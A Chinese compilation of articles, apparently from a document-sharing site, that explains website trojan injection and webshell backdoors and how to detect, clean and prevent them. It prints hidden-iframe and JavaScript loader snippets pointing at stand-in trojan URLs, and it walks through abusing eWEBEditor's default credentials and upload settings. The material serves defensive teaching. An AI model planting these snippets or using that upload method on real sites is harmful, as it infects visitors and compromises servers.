解析网页后门与网页挂马原理
网站挂马及检测技术

挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,敏感文件扫描,服务器漏洞,程序0day, 等各种方法获得管理员账号,然后登陆后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。
利用获得的webshell修改页面的容,向页面中加入恶意转向代码。
也可以直接通过弱口令获得服务器或者FTP,然后直接对页面直接进行修改。
当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
挂马的危害危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
很多游戏被挂马,黑客目的就是盗取浏览该玩家的游戏账号,而那些大型被挂马,则是为了搜集大量的肉鸡。
被挂马不仅会让自己的失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。
挂马泛滥的原因利。
病毒木马黑色产业链有丰厚的利润,去年警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马围哪些容易被挂马呢?越是流量高的对黑客越有吸引力,黑客攻破一个管理上有漏洞并且流量很高的,一天就可以感染数百万人。
那些与公共事业密切相关的,比如政府机关的,,视频,聊天交友,提供盗版软件破解工具的最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意等。
属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
系统中毒预防,系统安全,病毒,木马,挂马原理、挂马危害、挂马原因、挂马范围,和如何防范

读者会经常听到网页挂马这个词,网页挂马,这是一个相对专业的术语,通俗的描述是将网页木马这样的攻击程序放在网页上,浏览这个网页的人,不需要任何点击动作就会中毒。
网页挂马2007年以来对网络安全的影响十分重要,据金山、卡巴斯基、瑞星、江民等安全公司监测,网页挂马传播通道占到病毒传播的70%左右。
可以这样说,解决了网页挂马问题,上网中毒的可能性就将减少一大半。
本文简单的说一下。
挂马原理:网页挂马有个非常重要的特点,就是不需要下载安装软件,只要这个网页上有攻击代码,用浏览器看一眼就中毒。
其基本原理是利用了操作系统漏洞、浏览器漏洞(各种以IE为核心的浏览器被攻击的可能性最高,由市场占有率决定)、浏览器相关插件的漏洞(比如Flash、adobe acrobat等,非常多见)。
这些漏洞往往可以造成缓冲区溢出和权限提升,漏洞被利用,就可以执行攻击者设定的任意代码。
这就很明显了,黑客制造了一个攻击网页,利用这些漏洞的人,可以把这个攻击网页嵌入完全正常的页面,这个攻击代码对网民来说是完全看不见的,浏览器正在执行的攻击程序完全做到不给用户留下任何界面。
有的网页木马制作者直接打广告说,他的网马可以做到不崩不弹不卡(意思是浏览器不会崩溃不会弹对话框浏览速度不受影响),并且,这些挂马网页一般情况下会将多个漏洞复合使用,用户电脑上的风险可能不会全部修复,只要有一个存在,网马就会触发。
挂马危害:危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
在挂马网页横行的2007-2008年,大量挂马网站传播着AV终结者这样的木马下载器,并由此打开了病毒入侵的大门,各种盗号木马蜂拥而来对系统内的可用资源进行大哄抢。
挂马泛滥的原因:一个字:利。
病毒木马黑色产业链有丰厚的利润,去年南京警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网站挂马检测

网站挂马检测1. 简介在网络世界中,网站被黑客植入恶意挂马代码是一种很常见的攻击手段。
恶意挂马代码是指黑客将一段具有恶意功能的代码嵌入到网站的页面中,当用户访问被感染的页面时,恶意代码就会被执行,从而导致用户的计算机受到攻击。
为了保障网站和用户的安全,需要进行网站挂马检测。
2. 网站挂马检测的重要性挂马攻击会造成严重的后果,例如:•网站内容被恶意篡改,影响网站的正常运行和用户体验。
•用户计算机被感染,个人信息和敏感数据被窃取。
•网站被搜索引擎标记为不安全网站,导致排名下降和用户流失。
因此,网站挂马检测变得至关重要,通过定期检测可以及早发现潜在的挂马问题,以便采取相应的措施进行修复和保护。
3. 网站挂马检测的方法3.1 定期漏洞扫描每个网站都存在不同程度的漏洞,黑客可以利用这些漏洞进行挂马攻击。
定期进行漏洞扫描是一种常见的网站挂马检测方法。
漏洞扫描工具可以扫描网站的各种漏洞,并生成报告,报告中会列出潜在的挂马漏洞,以便管理员进行修复。
3.2 文件完整性检查网站的核心文件和脚本文件是黑客常常利用的目标。
通过定期检查这些文件的完整性,可以及早发现是否被篡改。
如果发现文件的MD5值或哈希值与原始文件不匹配,就可能存在被挂马的风险。
3.3 网络流量监控黑客常常通过网络流量进行挂马攻击。
建立网络流量监控系统可以及时发现异常的网络流量,并分析其源头,从而及早发现潜在的挂马攻击。
3.4 第三方工具和服务还可以借助第三方工具和服务进行网站挂马检测,例如腾讯云的云安全服务、百度安全管家等。
这些工具和服务通常具有专业的漏洞扫描功能,可以帮助管理员及时发现并解决潜在的挂马问题。
4. 挂马检测的预防措施除了进行定期的挂马检测,还需要采取一些预防措施来降低被挂马的风险。
•定期更新和升级网站的核心文件和脚本,避免利用已知的漏洞进行攻击。
•使用安全的密码和账户管理策略,避免被黑客猜测或破解密码。
•配置良好的防火墙和入侵检测系统,及时阻止异常的访问和攻击。
网页挂马检测技术研究

• 23•网页挂马是一种常见的网络攻击方式,对网络信息安全构成威胁。
黑客通过各种手段获取管理员账号,登陆并修改页面内容。
网页挂马检测技术,可以避免恶意网页的危害,保护用户利益。
本文对网页挂马技术做出概述,基于Python网络爬虫进行抓取,对抓取内容进行漏洞分析,深入研究web网页应用漏洞原理、检测方法。
1 引言web网页挂马指的是把一个木马程序上传到一个网站,然后用木马生成器生成一个网马,最后反传回空间。
黑客通过SQL注入,敏感文件的扫描,程序0day等方式获得网站管理员的账号,登陆网站的后台,目的是通过数据库备份与恢复或者上传某个漏洞获得一个webshell。
通过获得的webshell在网页上进行修改,也可以在页面中加入恶意HTML代码。
也可以直接通过弱口令来获取FTP,可直接对网站的页面进行修改(刘洁,我国网页篡改及挂马检测技术专利分析:中国科技信息,2018)。
web网页一旦被挂马就面临着安全问题,检测技术至关重要。
检测技术有如下三种:(1)特征匹配。
将网页挂马的脚本按脚本病毒处理进行检测。
(2)主动防御。
浏览器创建某项任务,被提问是否运行时,多数用户会选择是,网页木马因此被植入,这就是典型的网页挂马现象。
(3)脚本行为分析。
通过浏览器等主机的行为动作来判断网页是否含有木马。
本文是基于Python语言实现网络爬虫对网页进行漏洞检测,需要建立特征知识库匹配URL信息,本文主要研究特征匹配检测技术,将网页的源码进行特征值匹配,检测是否存在漏洞。
本文研究内容也是网络安全研究的热点之一。
2 网页挂马技术网页挂马是在可编辑文件中,或HTML代码头部中加入一段代码,来实现跳转到另一个网站,访问指定的HTML,然后通过漏洞攻破系统下载木马,进而隐藏下载木马并运行。
下面介绍几种网页挂马方式:(1)js文件挂马将js脚本的代码写在网页中,访问者在浏览网页时,恶意代码会通过主机打开网页木马的窗口,潜伏运行。
首先将以下代码document.write(“<iframe width=’0’ height=’0’src=’http //www.baidu/muma.htm’></iframe>”);保存为xxx.js,则js文件代码为<script language=javascript src=xxx.js></script>(2)body挂马body挂马可以在打开正常页面地址的时候,自动跳转到网马页面。
网页挂马之实战详解

网页挂马之实战详解不论是那一种帮凶,黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下,顺利将木马保存到被黑电脑中然后运行,经过多年的演变与发展,目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页),当被黑者浏览这个网页,就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞,此方法当然就无效)。
一般而言黑客想要利用漏洞来进行黑客任务,几乎都必须自己写工具程序才行,不过在黑客的世界中永远有奉献出自己心力的慈善家,因此网络上就有一些针对某些漏洞而设计的木马生成器,让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务,在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。
由于这类工具是帮助真正的木马植入被黑电脑中与运行,因此应该称为木马帮凶,而不是真正的木马,因此严格来说它应该是木马帮凶生成器,而不是木马生成器,像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。
◎木马帮凶生成器的问题与盲区可能有读者会认为:既然有现成的工具,那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆,的确没错,虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地),但是有经验黑客并不会因此而高兴,因为这些木马帮凶生成器的问题很多,并非找到后下载就能顺利使用,主要有下列问题:.虽然在查找网站中有找到,但单击后该网页已经不见了,当然也就不可能下载木马帮凶生成器,这种情况很常见,只好再试下一个查找到的项目。
.有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的,就算下载后可以正常使用,但对于已修补该漏洞的电脑当然就无效,也就是说年代愈久,木马生成器愈没有利用的价值 (对许多电脑可能都无效),因此这类木马查找到一大堆也几乎是废物。
网页木马机理与防御方法

网页木马机理与防御方法网页木马是指利用网络漏洞或者采用钓鱼等手段传播的,可以直接在用户浏览器中运行的恶意代码。
网页木马在用户不知情的情况下通过浏览器的漏洞或者其他手段渗透进来,一旦成功,就会进行各种攻击,比如窃取用户隐私,破坏系统安全等。
1. 攻击者利用漏洞:攻击者利用漏洞,通过特定的方法将木马代码植入网站。
2. 收集用户信息:木马攻击后,攻击者可以通过收集用户信息来获取重要的账户和密码信息。
3. 后门设置:攻击者可以利用网页木马来设置后门,以便随时进入系统。
4. 远程控制:网页木马可以给黑客提供远程控制权限,使他们能够使用受害者的电脑来进行各种攻击。
5. 绕过杀毒软件:网页木马通常可以绕过机器中安装的杀毒软件,因此其能够在不被发现的情况下运行。
1. 及时更新防病毒软件:防病毒软件可以对网页木马进行及时的识别和隔离,同时也可以升级软件以应对新型的木马病毒。
2. 限制浏览器的访问权限:对于一些敏感的网站或不必要的网站,可以将其浏览器访问权限限制,避免用户访问到不安全的站点。
3. 开启防弹窗功能:一些网页木马通过弹窗的方式,在用户不知情的情况下进行攻击。
因此,开启防弹窗功能是一种比较简单有效的防范措施。
4. 配置防火墙:防火墙可以有效地限制计算机对外界的接口,避免黑客利用网站漏洞进行攻击。
同时,防火墙也可以限制木马运行的端口。
5. 安装安全软件:一些安全软件,如安全防护软件以及防病毒软件,可以对用户计算机上的木马和病毒进行识别和隔离。
总之,对于网页木马的防范工作,需要从多个方向入手,提高网络安全意识、加强各类防护措施是防范网络木马攻击的重要方法。
网页后门木马扫描系统的设计和实现的原理

网页后门木马扫描系统的设计和实现的原理1 简介网页后门木马其实就是一段网页代码,主要以asp、jsp、php 代码为主。
由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。
并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。
网页挂马就是攻击者通过在正常网站的页面中插入一段代码。
浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
2 网页后门木马的类型2.1 框架嵌入式网页挂马网页木马被攻击者利用iframe 语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术[1]。
通常的挂马代码“<iframe src='实际木马地址' width=0height=0></iframe>”,用户访问该页面时会自动跳转到实际木马页面运行木马程序。
2.2 js 调用型网页挂马此类网页挂马是一种利用javascript 脚本文件调用的原理进行的网页木马挂马技术,比如将代码“document.write("<iframe width='0' height='0'src='实际木马地址'></iframe>");”保存为a.js,则js 调用型网页挂马代码为“<script language=javascript src=a.js></script>”,用户访问该页面时会调用a.js 运行远程木马。
2.3 图片伪装型网页挂马攻击者利用图片作为转移网页访问者视线的一种方式,将代码插入目标网站内页或另存为HTML 再上传到目标网站,当用户访问该网页时,就会中招[2]。
以上只是列出了三种最常见的网页挂马方式[3],但随着时间的推移,这些挂马方式将会演变成各种各样的形态,旨在盗取不同的机密或链接恶意木马页面。
网页挂马手段全解析

---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一,在 2008 年到2010 年间,网页挂马攻击更是成为了黑客最主要的攻击手段。
根据瑞星云安全系统监测, 2008 年到 2010 年间,客户端受到恶意网马的年攻击次数达到千万级别。
虽然近两年来,网络钓鱼攻击已经在数量上超越了网页挂马攻击,但是网页挂马攻击所带来的危害依然巨大,不仅对网站的安全运行造成威胁,对客户端用户来说,网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。
常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后,在网站的页面中插入一些代码,当浏览者访问到这些包含有恶意代码的网页时,就会在不知不觉中执行相应的漏洞利用程序。
这些程序可以在浏览者的电脑上下载并执行木马程序,导致浏览者的电脑成为黑客的肉鸡。
挂马操作可以有多种方式实现,以下是比较常见的几种挂马攻击手段。
1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架,在访问网页时,从网页表面是无法通过肉眼看到这个框架的,只能通过网页源码分析或抓包的方式查看到相应的数据信息。
1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中,同时恶意篡改网站文件中的 JS 文件代。
一般来讲,那些被全站引用的 JS 代码最容易被黑客挂马。
3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理,黑客通过加密代码的方式隐藏了该信息。
4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的,当用户访问挂有以上代码的网页时,页面就会自动跳转去执行黑客指定的恶意页面,从而导致挂在恶意页面的木马在本地被执行。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
解析网页后门与网页挂马原理转自IT168网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。
Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。
这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。
下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。
一、前置知识网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。
由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。
并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。
浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
二、网页挂马的类型1、框架嵌入式网络挂马网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。
通常的挂马代码如下:<iframe src=/muma.html width=0 height=0></iframe>解释:在打开插入该句代码的网页后,就也就打开了/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。
下面我们做过做个演示,比如在某网页中插入如下代码:<iframe src= width=200 height=200></iframe>在“百度”中嵌入了“IT168安全版块”的页面,效果如图1。
(图1)2、js调用型网页挂马js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。
通常代码如下:<script language=javascript src=/gm.js></script>/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。
这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了,如图2就是一个JS木马的代码。
(图2)3、图片伪装挂马随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似:/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图3。
图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:<html><iframe src="/test.htm" height=0 width=0></iframe><img src="/test.jpg"></center></html>注:当用户打开/test.htm是,显示给用户的是/test.jpg,而/test.htm网页代码也随之运行。
(图3)4、网络钓鱼挂马(也称为伪装调用挂马)网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。
这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。
比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码,如图4。
(图4)等用户输入完提交后,就把这些信息发送到攻击者指定的地方,如图5。
(图5)5、伪装挂马高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示或者等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗,示例代码如:<p><a id="qipian" href=""></a></p><div><a href="" target="_blank">><caption><label for="qipian"><u style="cursor;pointer;color;blue"> IT168安全版块</u></label></caption></table></a></div>上面的代码的效果,在貌似的链接如图6上点击却打开了,如图7。
(图6)(图7)总结:上述的挂马方式都是利用了系统的漏洞,并且挂马的代码不用攻击者编写,都是实现了工具化、傻瓜化。
技术门槛比较低,因此危害也特别大。
三、网页漏洞的寻找方法网页的漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。
针对这么多的漏洞威胁,网站管理员要对自己的网站进行安全检测,然后进行安全设置或者代码改写。
那如何来检测网站存在的漏洞呢?其实,很多攻击者都是通过一些黑客工具来检测网站的漏洞然后实施攻击的。
那么网站的管理员就可以利用这些工具对网站进行安全检测,看有没有上述漏洞,笔者就不一一演示了。
下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。
1、网站入侵分析eWEBEditor是一个在线的HTML编辑器,很多网站都集成这个编辑器,以方便发布信息。
低版本的eWEBEditor在线HTML编辑器,存在者上传漏洞,黑客利用这点得到WEBS HELL(网页管理权限)后,修改了网站,进行了挂马操作。
其原理是:eWEBEditor的默认管理员登录页面没有更改,而且默认的用户名和密码都没有更改。
攻击者登陆eWEBEditor后,添加一种新的样式类型,然后设置上传文件的类型,比如加入asp文件类型,就可以上传一个网页木马了。
(图8)2、判断分析网页漏洞(1)攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp?id="语句,只要类似的语句存在,就能判断网站确实使用了WEB编辑器。
(2)eWEBEditor编辑器可能被黑客利用的安全漏洞:a.管理员未对数据库的路径和名称进行修改,导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。
b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆或者直接输入默认的用户名和密码,直接进入编辑器的后台。
c.该WEB编辑器上传程序存在安全漏洞。
四、网页木马的防御和清除1、防御网页木马,服务器设置非常重要,反注册、卸载危险组件:(网页后门木马调用的组件)(1)卸载wscript.shell对象,在cmd先或者直接运行:regsvr32 /u %windir%system32WS Hom.Ocx(2)卸载FSO对象,在cmd下或者直接运行:regsvr32.exe /u %windir%system32scrrun.dll(3)卸载stream对象,在cmd下或者直接运行:regsvr32.exe /u /s "C:Program FilesCommon FilesSystemadomsado15.dll"注:如果想恢复的话只需重新注册即可,例如:regsvr32 %windir%system32WSHom.Ocx2、清理网页挂马(1)利用雷客图ASP站长安全助手查找所有在2008-3.1日-2008.3.5日之间所有修改过的文件里是否有iframe语句和/a.htm关键词,进行手工清理。
(2)也可利用雷客图ASP站长安全助手批量删除网马。
(3)检测JS文件,在2008-3.1日-2008.3.5日之间增加的JS文件全部删除。
(图9)从分析报告可以看到网站的admin路径下发现lb.asp网页木马,经分析为老兵的网页木马。
(加密后依旧能通过特征码分辨,推荐网站管理员使用雷客ASP站长安全助手,经常检测网站是否被非法修改。
)提示:雷客图ASP站长安全助手可以帮助站长分析网站的安全状况,但是一定要更改它的默认用户名和密码。
3、解决eWEBEditor编辑器安全隐患由于网站在开发时集成了eWEBEditor编辑器,删除或者替换容易导致其他问题的出现,推荐按如下方案解决:(1)修改该编辑器的默认数据库路径和数据库名,防止被黑客非法下载。
默认登录路径admin_login.asp默认数据库db/ewebeditor.mdb(2)修改编辑器后台登录路径和默认的登录用户名和密码,防止黑客进入管理界面。
默认帐号admin默认密码admin或者admin888(图10)(3)对Upload.asp语句进行修改,防止黑客利用其上传ASP木马从而获得WEB权限。
对上传语句现在进行修改:将原来的:sAllowExt=Replace(UCase(sAllowExt),"ASP","")修改为:sAllowExt=Replace(UCase(sAllowExt),"ASP",""),"CER",""),"ASA",""),"CDX",""),"HTR","")增加上传对cer、asa、cdx、htr文件类型的限制,因为这些类型的文件都是可以执行的文件,可以被攻击者利用进行对网站及其服务器进行危险操作的文件类型。
总结:网页后门和网页挂马是网站最大的敌人,他们对网站的危害几乎是毁灭性的。
网站管理员们只有了解了其原理、掌握防治技术才能保护网站的安全。